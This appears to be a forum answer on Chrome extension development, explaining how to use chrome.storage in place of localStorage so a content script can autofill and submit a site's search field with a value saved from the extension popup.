You can access the extension's data inside content scripts directly by replacing localstorage with the chrome.storage extension api. Add the "storage" (silent) permission to your manifest.json, like this:
"permissions": ["storage"]
Remove the message passing code in background.js. Then replace the popup button listener contents with:
chrome.storage.local.set({ "company": csearch.value }, function() {
chrome.tabs.create({ url: "whatever url" })
})
Replace the content script with:
chrome.storage.local.get("company", function(items) {
if(document.querySelector("#txtQSearch").value == "") {
document.querySelector("#txtQSearch").value = items.company
document.querySelector("#btnQSearch").click()
}
})
document.querySelector() performs the same function here as getElementById, but it is much more robust. It also has less capital letters, which makes it easier to type in my opinion.

Categories

Resources